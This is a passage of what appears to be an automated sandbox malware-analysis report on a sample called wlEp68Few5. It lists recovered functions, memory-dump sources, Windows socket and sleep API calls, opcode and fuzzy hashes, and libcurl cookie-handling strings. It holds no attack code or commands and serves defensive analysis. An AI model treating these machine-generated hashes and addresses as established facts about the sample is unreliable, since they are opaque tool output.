                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID:
                                                      • API String ID: 98920635-0
                                                      • Opcode ID: 1814262b5ce76d957d5c5d7e961f00b6fefb2d9d59835b6fb564ebbe60d2fb5b
                                                      • Instruction ID: bd82950f9df5c3bd7ca070d4d46fef6a14b3d394290ad7b39d4e56ec9f523b65
                                                      • Opcode Fuzzy Hash: 1814262b5ce76d957d5c5d7e961f00b6fefb2d9d59835b6fb564ebbe60d2fb5b
                                                      • Instruction Fuzzy Hash: 06E0EDB6A092216BD654DB18E8449ABF76DEFC4B20F055A49B89467214C730AC508BE2
                                                      Function 0053B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • closesocket.WS2_32(?,00539422,?,?,?,?,?,?,?,?,?,?,?,w3R,008B7680,00000000), ref: 0053B04D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID:
                                                      • API String ID: 2781271927-0
                                                      • Opcode ID: 82ddc829ac3169fbb57857aff16e84ec711ac0acefa5f46dcc4a7b645b8326a5
                                                      • Instruction ID: 722037e813ef61dc5827526a7b34f8bd5bc20e8a8c72bce9562b295bbebe8943
                                                      • Opcode Fuzzy Hash: 82ddc829ac3169fbb57857aff16e84ec711ac0acefa5f46dcc4a7b645b8326a5
                                                      • Instruction Fuzzy Hash: DFD0C23470020157DA288A14C888A577B2B7FC1310FA8CB6CE12C4A150C73BCC53CA02
                                                      Function 004D67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ioctlsocket.WS2_32(?,8004667E,?,?,004AAF56,?,00000001), ref: 004D67FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocket
                                                      • String ID:
                                                      • API String ID: 3577187118-0
                                                      • Opcode ID: 4b684d67f0bcbb1c900b0e46d6f900412782ef9a7e69e24fc2f330ac78d8d687
                                                      • Instruction ID: 2b0ae00581e3a75f282725680869c27435caa52bce6662156e2d78574cf11873
                                                      • Opcode Fuzzy Hash: 4b684d67f0bcbb1c900b0e46d6f900412782ef9a7e69e24fc2f330ac78d8d687
                                                      • Instruction Fuzzy Hash: 50C012F1109600AFC60C4724D955A6EB6E8DB85255F01591CB04692180EA74D450CA16
                                                      Function 004731D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: d9433dfa1218f8fba2edb421470e5ee0eecac7164cedabde95f0a0071a2c26cb
                                                      • Instruction ID: f2dad5d967e535f5d21ac437e1395f7291e8052b01a1299c0a19c91c27650448
                                                      • Opcode Fuzzy Hash: d9433dfa1218f8fba2edb421470e5ee0eecac7164cedabde95f0a0071a2c26cb
                                                      • Instruction Fuzzy Hash: F531D2B09093189BDB10EFB8D5856AEBBF0FF44300F008869E898E7351E7789A44CF52
                                                      Function 007FB160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 8500f156d9068356d02784104dd11e2190438797588e249b95e9536070249f6e
                                                      • Instruction ID: 05419339199a073b661d92223495e78c929e5fee9dee4676adfd2da98630d83a
                                                      • Opcode Fuzzy Hash: 8500f156d9068356d02784104dd11e2190438797588e249b95e9536070249f6e
                                                      • Instruction Fuzzy Hash: 39C04CE1C1474486D700BA38854611D79E47745104FC11BA8998596195F72897188657
                                                      Function 070F0C9D Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c872f84ce34963cd4164ef75426e101e52efd56ac125b8e1d123ee8d59c51a0
                                                      • Instruction ID: fac296cedcc21f8e7f88257509c5ec428b52ac219fb18c89bf94a38e66beecb1
                                                      • Opcode Fuzzy Hash: 8c872f84ce34963cd4164ef75426e101e52efd56ac125b8e1d123ee8d59c51a0
                                                      • Instruction Fuzzy Hash: 3741DEEB24C254BEB60281816F64AFFAB7EE6C3730B30852BF912D6903E2944E5D5131
                                                      Function 070F0D0F Relevance: .2, Instructions: 196COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 951b693771009eab9006dac4611c6b4e16e86659f84b1ddc0eaa47f7380f1dac
                                                      • Instruction ID: f546967a3a5f4d1323a02c2b9b3c42d1bc6b586a476dccbc04905cb1846e09ee
                                                      • Opcode Fuzzy Hash: 951b693771009eab9006dac4611c6b4e16e86659f84b1ddc0eaa47f7380f1dac
                                                      • Instruction Fuzzy Hash: 6D41DDEB25C254BDB602C1816B54AFFBB7EE6C7730B30852BF912D6903E2944E4E5131
                                                      Function 070F0C70 Relevance: .2, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a541f6559333055b53cc15a3148aea7101a9cf2597205c3dd669fa891cdf103c
                                                      • Instruction ID: 059c8114edff2536d69e5b581ca65ad26f530056432a5c1bdc22c8931589b9ff
                                                      • Opcode Fuzzy Hash: a541f6559333055b53cc15a3148aea7101a9cf2597205c3dd669fa891cdf103c
                                                      • Instruction Fuzzy Hash: 6A31C9EB25C254BEB10281816B54AFFAB7EE6C7330B30892BF913D2903E2984E4D5131
                                                      Function 070F0D39 Relevance: .2, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d17ebe98dc5b7c29246e241f84b09c6f2c1d4781581fed1891fdc6dff038698b
                                                      • Instruction ID: a15bf8f094307896ff1a951f2c2148a847a38465c7fb03c3c7a0e04e8ff92c14
                                                      • Opcode Fuzzy Hash: d17ebe98dc5b7c29246e241f84b09c6f2c1d4781581fed1891fdc6dff038698b
                                                      • Instruction Fuzzy Hash: 8731ADEB249154BDB10280816F24AFFAB3EE6D7730B318527F912D1903E2985E4E5131
                                                      Function 070F0CD0 Relevance: .2, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8a89196cea00763946299b16db181941aa254ec2b812f836f31c95151f12aea
                                                      • Instruction ID: c48951b14c31bb3ae5389f4d17c88662703fe2291ac09f22a916f4982443c2b4
                                                      • Opcode Fuzzy Hash: d8a89196cea00763946299b16db181941aa254ec2b812f836f31c95151f12aea
                                                      • Instruction Fuzzy Hash: 623167EF298114BDB14281816B14AFFA77EE6C7730B30852BF913D2903E2945E4E5131
                                                      Function 070F0CE3 Relevance: .2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fa0611e3f3a0ebbc51d7b6a5a060e6d800600c7f2c510871cb5befafc495f79
                                                      • Instruction ID: ca5e0df878c6af84165c659cb0d9ef143eab6c94e0d7df7930204f80be0629b2
                                                      • Opcode Fuzzy Hash: 6fa0611e3f3a0ebbc51d7b6a5a060e6d800600c7f2c510871cb5befafc495f79
                                                      • Instruction Fuzzy Hash: F231AAEB248114BDB50280816B14AFFA77EE6C7330B30853BF913D2A03E2D85E4E5131
                                                      Function 070F0D00 Relevance: .2, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5edfd04a7ef8d85c2db21580b924471fc51981120f6c38cc6b32c91148144e74
                                                      • Instruction ID: 24df69054cc3e330e272484729d5543fd957a74f131d8685b662b82654845943
                                                      • Opcode Fuzzy Hash: 5edfd04a7ef8d85c2db21580b924471fc51981120f6c38cc6b32c91148144e74
                                                      • Instruction Fuzzy Hash: AB3169EF248114BDB50280826F64AFFA73EE6D7730B31852BF913D1903E2985E4E5131
                                                      Function 070F0D25 Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d58cf0ac21a6c702809671b71e23f4cab03a8e847b3a11451720e57800688562
                                                      • Instruction ID: e4f501fc0206a34a835a14e6cd488b7366bfd4448ff37981c0001154497e172c
                                                      • Opcode Fuzzy Hash: d58cf0ac21a6c702809671b71e23f4cab03a8e847b3a11451720e57800688562
                                                      • Instruction Fuzzy Hash: C92146EF288124BDB54280822B64AFFA76EE2C7730B318527F913D1903E2985E4E5131
                                                      Function 070F0D57 Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91956edc2c1ce30e04918757b06c9c482297a2aa572f5fa9524c1bab2fe88e5d
                                                      • Instruction ID: a1d8858cfb8c266ea3061bd7cca5e0b6ca2bdae06f68e280c89a56ed9cb5464c
                                                      • Opcode Fuzzy Hash: 91956edc2c1ce30e04918757b06c9c482297a2aa572f5fa9524c1bab2fe88e5d
                                                      • Instruction Fuzzy Hash: 38214AEF248154BDB54281822B64AFFA77EE6D7730B31853BF912D2903E2D84E5E5131
                                                      Function 070F0D68 Relevance: .1, Instructions: 142COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bda5efbbfd474cb46e199c0668d7ee4dfafa456034a82cae790b0919fb8b8a9
                                                      • Instruction ID: eedd091d589f6c0809456b8282bd20ee5bec86e4369dda54e09eb9a01d57db51
                                                      • Opcode Fuzzy Hash: 7bda5efbbfd474cb46e199c0668d7ee4dfafa456034a82cae790b0919fb8b8a9
                                                      • Instruction Fuzzy Hash: D1219CEF248214BDB60295826B64AFFA77EE6C7730B31853AF803D2903E2954E4E5130
                                                      Function 070F0D99 Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83d84a65a3bf20b15071bf6f170ad6f671e1eef6d7e904618ffe4dac2a481064
                                                      • Instruction ID: e4bdda9ce3a7e55b458d6c600528deceb736b7c68e55cd24c55efc5dfb6a2b67
                                                      • Opcode Fuzzy Hash: 83d84a65a3bf20b15071bf6f170ad6f671e1eef6d7e904618ffe4dac2a481064
                                                      • Instruction Fuzzy Hash: 182158EF2482547DB54281826B24AFFA73EE6C7730B31893BF912D2903E2990E4E5131
                                                      Function 070F0DD1 Relevance: .1, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b692db51a9a74f421f98d1d10629588c42f09f7811647c46ee359edf34d1cf6c
                                                      • Instruction ID: ef13d262a3ca2417600fca596dda5535e9ba3a86112edbc136351bb99cea97c2
                                                      • Opcode Fuzzy Hash: b692db51a9a74f421f98d1d10629588c42f09f7811647c46ee359edf34d1cf6c
                                                      • Instruction Fuzzy Hash: 2711CEEB248214BEB50291816F60BFFAB7EE7D7730B318936F912D2643E2980E4D5130
                                                      Function 070F0DC3 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8309901a8253a7921ee971393bb03c925b728d39615e3b9e32fffd5fd90f292d
                                                      • Instruction ID: 244aa0fb77ae70c6648b66ee5fa1f4476b0b50de0c37aa476d63016205f4cc85
                                                      • Opcode Fuzzy Hash: 8309901a8253a7921ee971393bb03c925b728d39615e3b9e32fffd5fd90f292d
                                                      • Instruction Fuzzy Hash: 1311BCEB248214BDB50281826B24BFFA73EE7D3730B31857AF902D2903E2950E4D5130
                                                      Function 070F0DEB Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462405063.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_70f0000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ce178e5397159433d024e1a4f604244625676c25db9fb39359eba0b35caa106d
                                                      • Instruction ID: 5d2e0c05fc32a649963308c92ec1efa141e4a651d6d4e9855953645adfe2062e
                                                      • Opcode Fuzzy Hash: ce178e5397159433d024e1a4f604244625676c25db9fb39359eba0b35caa106d
                                                      • Instruction Fuzzy Hash: 45116DEB2482687DB54290822F54BFFA77EE6D7730B318576F902D2903E2D90E9D5131

                                                      Non-executed Functions

                                                      Function 004B1BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                      • API String ID: 0-1371176463
                                                      • Opcode ID: 9fba57bba2b6fc5809c4196d3f5a9eef47ebe26c71ced4fae66cf0f383c15907
                                                      • Instruction ID: b6694bac6e49c080b840184a7aabe1c9a0e86582476d28273d960de1181dad7e
                                                      • Opcode Fuzzy Hash: 9fba57bba2b6fc5809c4196d3f5a9eef47ebe26c71ced4fae66cf0f383c15907
                                                      • Instruction Fuzzy Hash: 9BB25C70A04700ABD7249F25DD56BA77BD5AF44308F08482EF88997392E7BDEC40D76A
                                                      Function 00484940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
